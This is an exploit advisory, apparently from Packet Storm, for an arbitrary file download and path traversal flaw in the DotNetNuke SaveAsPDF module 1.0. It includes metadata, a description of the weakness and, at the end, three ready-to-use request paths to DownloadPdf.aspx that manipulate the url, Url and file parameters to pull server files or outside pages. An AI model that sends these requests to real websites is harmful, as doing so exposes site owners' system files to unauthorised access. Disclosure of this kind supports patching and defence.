DotNetNuke SaveAsPDF module version 1.0 suffers from an arbitrary file download vulnerability.
4874d6c163e0bb30017d6b7221e9448c####################################################################
# Exploit Title : DotNetNuke SaveAsPDF Modules 1.0 Arbitrary File Download
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 12/03/2019
# Vendor Homepage : bizmodules.net ~ dnnsoftware.com
# Software Information Links :
bizmodules.net/Products/SaveasPDF/tabid/188/Default.aspx
bizmodules.net/portals/0/downloads/sap.pdf
# Software Version : 1.0 ~ Compatible with DNN 4.5.x and 5.0.x
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type :
CWE-200 [ Information Exposure ]
CWE-23 [ Relative Path Traversal ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
####################################################################
# Description about Software :
***************************
Save As PDF (SAP) is a DotNetNuke (DNN) application designed to work in DotNetNuke
websites only. SAP is used to convert a DotNetNuke page to Adobe PDF format, including
texts, pictures and even flash contents.
####################################################################
# Impact :
***********
* DotNetNuke SaveAsPDF Modules 1.0 is prone to a vulnerability that lets attackers download
arbitrary files because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit this issue to download arbitrary files within the context of the
web server process and obtain potentially sensitive informations and it works for
open redirection vulnerability.
* An information exposure is the intentional or unintentional disclosure of information to an actor
that is not explicitly authorized to have access to that information.
* The software uses external input to construct a pathname that should be within a
restricted directory, but it does not properly neutralize sequences such as ".." that
can resolve to a location that is outside of that directory.
####################################################################
# Arbitrary File Download Exploit :
*******************************
/DesktopModules/SaveAsPDF/DownloadPdf.aspx?url=https://www.[RANDOMWEBSITE].gov
/DesktopModules/SaveAsPDF/DownloadPdf.aspx?Name=[ID-NUMBER]&Url=[FILENAME]
/DesktopModules/SaveAsPDF/DownloadPdf.aspx?Name=[ID-NUMBER]&file=[FILENAME]
Note : It can download any random website as pdf file in to your computer and
it downloads a system files from DNNSoftware.
####################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################